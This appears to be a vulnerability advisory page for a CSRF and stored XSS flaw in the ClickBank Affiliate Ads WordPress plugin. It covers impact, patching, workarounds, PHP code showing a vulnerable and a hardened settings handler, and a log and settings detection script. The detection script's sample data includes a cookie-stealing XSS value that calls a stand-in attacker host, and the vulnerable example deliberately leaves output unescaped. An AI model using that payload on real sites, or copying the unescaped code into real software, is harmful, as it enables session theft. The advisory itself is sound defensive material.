CVE-2015-20105
📋 TL;DR
The ClickBank Affiliate Ads WordPress plugin, in versions up to and including 1.20, saves its settings without a CSRF check and outputs some of those settings without escaping. An attacker who lures a logged-in administrator to a crafted page can silently change the plugin settings and store a JavaScript payload in them; that payload is then rendered on pages carrying the ad unit and executes in visitors' browsers (stored cross-site scripting).
💻 Affected Systems
- ClickBank Affiliate Ads WordPress Plugin
📦 What is this software?
A WordPress plugin that inserts ClickBank affiliate advertisements into a site's pages. The ad unit is configured from a settings page in the WordPress admin, and it is those settings that the vulnerability concerns.
⚠️ Risk & Real-World Impact
Worst Case
The stored script runs in an administrator's browser and uses their session to create a new admin user or upload a backdoor plugin, giving the attacker administrative control of the site and, through the plugin upload, code execution on the web server.
Likely Case
The stored script steals visitor or admin cookies and sessions, redirects visitors to phishing pages, or replaces the affiliate ads with the attacker's own.
If Mitigated
With a nonce check on the settings form and output escaping in place, a cross-site request is rejected and stored values cannot break out of the HTML they are printed into; the only trace is a failed request.
🎯 Exploit Status
No public exploit is linked from this page. Exploitation needs a logged-in administrator to load an attacker-controlled page (the CSRF step); the injected setting then persists and fires on every render until it is removed. Updating the plugin stops new injections but does not clean a payload that is already stored.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.21 or later
Vendor Advisory: https://wpscan.com/vulnerability/2bc3af7e-5542-40c4-8141-7c49e8df68f0
Restart Required: No
Instructions:
1. Update the plugin to version 1.21 or later via the WordPress admin panel (Plugins > Installed Plugins) or WP-CLI.
2. Verify that the update completed and the version shown is 1.21 or later.
3. Inspect the plugin's stored settings for HTML tags, inline event handlers (onload=, onmouseover=, ...) or javascript: URLs, and reset any that contain them; the update does not remove a payload that was stored before it.
4. Clear any page cache and browser cache, then confirm the ad unit still renders and settings still save.
🔧 Temporary Workarounds
Disable Plugin
Temporarily disable the vulnerable plugin until patched
wp plugin deactivate clickbank-affiliate-ads
Apply CSRF Protection
Fork the plugin and add a WordPress nonce check (wp_nonce_field() in the form, check_admin_referer() in the save handler) plus esc_attr() on every setting that is echoed into markup. Only worthwhile where the official update cannot be applied, since you then maintain the modified copy.
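The pattern behind both the bug and the fix, as an added example and not the plugin's own code: a minimal WordPress settings handler and renderer in their vulnerable shape next to a hardened version. The option name cba_example_ad_title, the nonce action cba_example_save and the admin page slug cba-example are assumed names chosen for illustration; the WordPress functions (check_admin_referer, wp_nonce_field, esc_attr, sanitize_text_field, admin_post_* hooks) are real.

```php
<?php
/*
 * Added example, not code from the ClickBank Affiliate Ads plugin.
 * Option name, nonce action and page slug below are assumed for illustration.
 */

// --- BEFORE: no nonce, raw value stored, raw value echoed into an attribute.
function cba_example_save_settings_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    if ( isset( $_POST['cba_example_ad_title'] ) ) {
        // Any page the admin visits can POST this form; the value is stored as-is.
        update_option( 'cba_example_ad_title', wp_unslash( $_POST['cba_example_ad_title'] ) );
    }
}

function cba_example_render_ad_vulnerable() {
    $title = get_option( 'cba_example_ad_title', '' );
    // Unescaped: a stored value such as  x" onmouseover="alert(1)  closes the attribute.
    echo '<a class="cba-ad" title="' . $title . '" href="https://example.invalid/">Ad</a>';
}

// --- AFTER: capability check + nonce + sanitisation on input, escaping on output.
function cba_example_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="cba_example_save">
        <?php wp_nonce_field( 'cba_example_save', 'cba_example_nonce' ); ?>
        <input type="text" name="cba_example_ad_title"
               value="<?php echo esc_attr( get_option( 'cba_example_ad_title', '' ) ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}

function cba_example_save_settings_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // Dies with HTTP 403 unless the request carries a nonce bound to this user,
    // this action and this session; a form on another origin cannot obtain one.
    check_admin_referer( 'cba_example_save', 'cba_example_nonce' );

    $title = isset( $_POST['cba_example_ad_title'] )
        ? sanitize_text_field( wp_unslash( $_POST['cba_example_ad_title'] ) )
        : '';
    update_option( 'cba_example_ad_title', $title );

    // Assumed page slug 'cba-example'.
    wp_safe_redirect( admin_url( 'admin.php?page=cba-example&updated=1' ) );
    exit;
}
add_action( 'admin_post_cba_example_save', 'cba_example_save_settings_fixed' );

function cba_example_render_ad_fixed() {
    $title = get_option( 'cba_example_ad_title', '' );
    // esc_attr() encodes quotes and angle brackets, so the value stays inside the attribute.
    echo '<a class="cba-ad" title="' . esc_attr( $title ) . '" href="https://example.invalid/">Ad</a>';
}
```

The two defects are independent: sanitize_text_field() on input strips tags but does not make a value safe inside an attribute, and a nonce stops cross-site submission but does nothing for a value an attacker has already stored, so both the check_admin_referer() call and the esc_attr() call are needed.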
🧯 If You Can't Patch
- Remove plugin entirely and use alternative affiliate solutions
- Serve a Content Security Policy whose script-src does not allow 'unsafe-inline' (use nonces or hashes for legitimate inline scripts); this blocks injected script tags and inline event handlers on the affected pages, limiting the XSS impact rather than removing the flaw
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel > Plugins > ClickBank Affiliate Ads version. If version is 1.20 or earlier, vulnerable.
Check Version:
wp plugin list --name=clickbank-affiliate-ads --field=version
Verify Fix Applied:
Verify plugin version is 1.21 or later in WordPress admin panel and test settings save functionality.
📡 Detection & Monitoring
Log Indicators:
- POST requests to the plugin's settings page (shown here as /wp-admin/admin.php?page=clickbank-affiliate-ads; confirm the slug against the installed plugin) whose Referer or Origin header is absent or names another site
- JavaScript injection in plugin settings fields
Network Indicators:
- Settings-page POSTs arriving from an admin session shortly after that admin fetched a page from an unfamiliar third-party site
- Script or resource loads from unexpected domains on pages that carry the ad unit
SIEM Query:
source="wordpress" AND (uri="/wp-admin/admin.php?page=clickbank-affiliate-ads" OR plugin="clickbank-affiliate-ads")
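The two log indicators above, checked by a small added PHP script that is not part of the page's vendor material or the plugin: it parses Apache combined-format lines, flags settings-page POSTs whose Referer is missing or from another host, and separately flags stored setting values that contain markup. The site host blog.example, the log lines and the stored values are constructed for the example; the settings path is the one given above and should be confirmed locally.

```php
<?php
/*
 * Added example, not the plugin's or vendor's code. Host, log lines and
 * stored values are constructed; the settings path is assumed as above.
 */

const SITE_HOST     = 'blog.example';
const SETTINGS_PATH = '/wp-admin/admin.php?page=clickbank-affiliate-ads';

// Constructed Apache "combined" format lines, not real traffic.
$log_lines = [
    '203.0.113.5 - - [12/May/2015:10:01:02 +0000] "GET /wp-admin/admin.php?page=clickbank-affiliate-ads HTTP/1.1" 200 5120 "https://blog.example/wp-admin/plugins.php" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2015:10:01:30 +0000] "POST /wp-admin/admin.php?page=clickbank-affiliate-ads HTTP/1.1" 302 0 "https://blog.example/wp-admin/admin.php?page=clickbank-affiliate-ads" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2015:11:45:10 +0000] "POST /wp-admin/admin.php?page=clickbank-affiliate-ads HTTP/1.1" 302 0 "http://attacker.invalid/free-stuff.html" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2015:11:46:00 +0000] "POST /wp-admin/admin.php?page=clickbank-affiliate-ads HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2015:12:00:00 +0000] "GET /2015/05/some-post/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
];

/** Parse one combined-format line; returns null for lines that do not match. */
function parse_combined_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'path' => $m[3],
            'status' => (int) $m[4], 'referer' => $m[5]];
}

/**
 * A settings POST whose Referer is absent or from another origin has the shape
 * of a CSRF request: the admin's browser sent it, but not from our own page.
 */
function is_cross_site_settings_post(array $r): bool {
    if ($r['method'] !== 'POST' || $r['path'] !== SETTINGS_PATH) {
        return false;
    }
    if ($r['referer'] === '-' || $r['referer'] === '') {
        return true; // no Referer at all (e.g. the attacker page sets Referrer-Policy: no-referrer)
    }
    $host = parse_url($r['referer'], PHP_URL_HOST);
    return strcasecmp((string) $host, SITE_HOST) !== 0;
}

foreach ($log_lines as $line) {
    $r = parse_combined_line($line);
    if ($r !== null && is_cross_site_settings_post($r)) {
        printf("SUSPECT CSRF: %s POST %s referer=%s\n", $r['ip'], $r['path'], $r['referer']);
    }
}

// Second indicator: markup in stored settings (e.g. from a wp option dump). Constructed values.
$stored_settings = [
    'ad_title' => 'Best deals this week',
    'ad_width' => '300',
    'ad_text'  => 'x" onmouseover="fetch(\'//attacker.invalid/?c=\'+document.cookie)',
];

/** Tags, inline event handlers or javascript: URLs have no place in ad settings. */
function looks_like_injected_script(string $value): bool {
    return (bool) preg_match('/<\s*\/?\s*[a-z]+[^>]*>|\bon[a-z]+\s*=|javascript:/i', $value);
}

foreach ($stored_settings as $key => $value) {
    if (looks_like_injected_script($value)) {
        printf("SUSPECT STORED XSS in option '%s': %s\n", $key, $value);
    }
}
```

Run with php on a copy of the access log (replace the constructed array with file() output) and on the plugin's option values exported with wp option get. The Referer heuristic misses requests where the browser suppresses the header for legitimate reasons, and the value check is deliberately loose (a value such as "one=two" trips it), so treat hits as leads to review rather than verdicts.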
🔗 References
- https://packetstormsecurity.com/files/131814/
- https://seclists.org/bugtraq/2015/May/45
- https://wpscan.com/vulnerability/2bc3af7e-5542-40c4-8141-7c49e8df68f0